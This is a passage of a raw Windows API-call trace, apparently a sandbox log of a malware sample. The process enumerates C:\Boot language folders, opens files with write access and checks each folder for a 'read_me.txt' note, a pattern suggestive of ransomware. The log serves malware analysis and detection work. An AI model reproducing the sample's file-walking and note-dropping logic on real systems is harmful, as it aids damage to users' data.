nFileSizeLow=0x16250, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.865] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0073.865] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.865] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.865] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt") returned 29 [0073.865] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt" (normalized: "c:\\boot\\pl-pl\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.865] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.865] CloseHandle (hObject=0x7ac) returned 1 [0073.865] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167ed4d0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167ed4d0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167ed4d0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.866] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.866] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt") returned 29 [0073.866] GetProcessHeap () returned 0x280000 [0073.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.866] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 17 [0073.866] GetProcessHeap () returned 0x280000 [0073.866] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b000e0 | out: hHeap=0x280000) returned 1 [0073.866] GetProcessHeap () returned 0x280000 [0073.866] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.866] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0073.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.866] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0073.866] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.866] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0073.866] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.866] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0073.866] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.866] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.866] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt") returned 29 [0073.866] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt" (normalized: "c:\\boot\\pt-br\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.866] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.867] CloseHandle (hObject=0x7ac) returned 1 [0073.867] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.867] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.867] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt") returned 29 [0073.867] GetProcessHeap () returned 0x280000 [0073.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.867] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 18 [0073.867] GetProcessHeap () returned 0x280000 [0073.867] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b100e8 | out: hHeap=0x280000) returned 1 [0073.869] GetProcessHeap () returned 0x280000 [0073.869] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.869] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0073.869] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.869] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0073.869] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.869] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0073.869] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.869] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0073.869] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.869] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.869] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt") returned 29 [0073.869] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt" (normalized: "c:\\boot\\pt-pt\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.869] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.869] CloseHandle (hObject=0x7ac) returned 1 [0073.869] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.870] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.870] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt") returned 29 [0073.870] GetProcessHeap () returned 0x280000 [0073.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.870] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 19 [0073.870] GetProcessHeap () returned 0x280000 [0073.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b200f0 | out: hHeap=0x280000) returned 1 [0073.870] GetProcessHeap () returned 0x280000 [0073.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b20008 [0073.871] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0073.871] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.871] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0073.871] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.871] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0073.871] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.871] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0073.871] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.871] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.871] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt") returned 29 [0073.871] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt" (normalized: "c:\\boot\\ru-ru\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.871] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.871] CloseHandle (hObject=0x7ac) returned 1 [0073.871] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.871] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.871] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt") returned 29 [0073.871] GetProcessHeap () returned 0x280000 [0073.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b20008 | out: hHeap=0x280000) returned 1 [0073.871] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 20 [0073.872] GetProcessHeap () returned 0x280000 [0073.872] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b300f8 | out: hHeap=0x280000) returned 1 [0073.872] GetProcessHeap () returned 0x280000 [0073.872] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.873] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0073.873] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.873] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0073.873] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.873] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0073.873] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.873] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0073.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.873] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.873] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt") returned 29 [0073.873] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt" (normalized: "c:\\boot\\sv-se\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.873] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.873] CloseHandle (hObject=0x7ac) returned 1 [0073.873] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16813630, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16813630, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16813630, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.873] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.873] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt") returned 29 [0073.873] GetProcessHeap () returned 0x280000 [0073.873] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.873] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 21 [0073.874] GetProcessHeap () returned 0x280000 [0073.874] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b40100 | out: hHeap=0x280000) returned 1 [0073.874] GetProcessHeap () returned 0x280000 [0073.874] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.874] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0073.874] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.874] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0073.874] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x168f7e70, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x168f7e70, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.874] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0073.874] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.874] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0073.874] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), 